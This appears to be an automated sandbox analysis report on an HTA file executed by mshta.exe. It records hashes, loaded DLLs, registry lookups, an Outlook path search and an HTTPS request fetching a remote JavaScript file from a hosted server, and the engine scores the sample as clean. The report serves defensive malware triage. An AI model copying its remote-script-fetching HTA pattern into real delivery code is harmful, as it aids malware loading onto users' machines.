Windows Analysis Report
65#U2465.hta

Overview

General Information

Sample name: 65#U2465.hta
renamed because original name is a hash value
Original sample name: _.hta
Analysis ID: 1592542
MD5: f03c02aef6a1354ea5dc03bd1618ffaa
SHA1: 6e23b3b6e6f24aaa974260c9f082fcfed0ffa122
SHA256: 62091fb092ddf19b73aeb835adbb9a17fa91e00fb0bf19881b2b946078f917f0
Infos:

Detection

Score: 2
Range: 0 - 100
Whitelisted: false
Confidence: 80%

Signatures

JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Source: unknown HTTPS traffic detected: 208.109.233.61:443 -> 192.168.2.7:49700 version: TLS 1.2
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 61.233.109.208.host.secureserver.netConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /GGOTSPH54/GGOTSPH54gerw/cPG711.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 61.233.109.208.host.secureserver.netConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: 61.233.109.208.host.secureserver.net
Source: mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/
Source: mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp, 65#U2465.hta String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js
Source: mshta.exe, 00000002.00000003.1290196541.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.00000000035BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsVRh
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsZG
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsdll~T
Source: mshta.exe, 00000002.00000003.1290497699.0000000003597000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003597000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jskT
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsuT
Source: mshta.exe, 00000002.00000002.2497161298.0000000006EE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.jsx
Source: mshta.exe, 00000002.00000002.2492653436.0000000003512000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003532000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js~T
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown HTTPS traffic detected: 208.109.233.61:443 -> 192.168.2.7:49700 version: TLS 1.2
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: clean2.winHTA@1/0@1/1
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: mshta.exe, 00000002.00000002.2492653436.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.2492653436.0000000003556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290196541.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1290497699.0000000003556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592542 Sample: 65#U2465.hta Startdate: 16/01/2025 Architecture: WINDOWS Score: 2 8 61.233.109.208.host.secureserver.net 2->8 5 mshta.exe 12 2->5         started        process3 dnsIp4 10 61.233.109.208.host.secureserver.net 208.109.233.61, 443, 49700 AS-26496-GO-DADDY-COM-LLCUS United States 5->10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.109.233.61
 61.233.109.208.host.secureserver.net United States
26496 AS-26496-GO-DADDY-COM-LLCUS false

Contacted Domains

Name IP Active
61.233.109.208.host.secureserver.net 208.109.233.61 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://61.233.109.208.host.secureserver.net/GGOTSPH54/GGOTSPH54gerw/cPG711.js false
  • Avira URL Cloud: safe
 unknown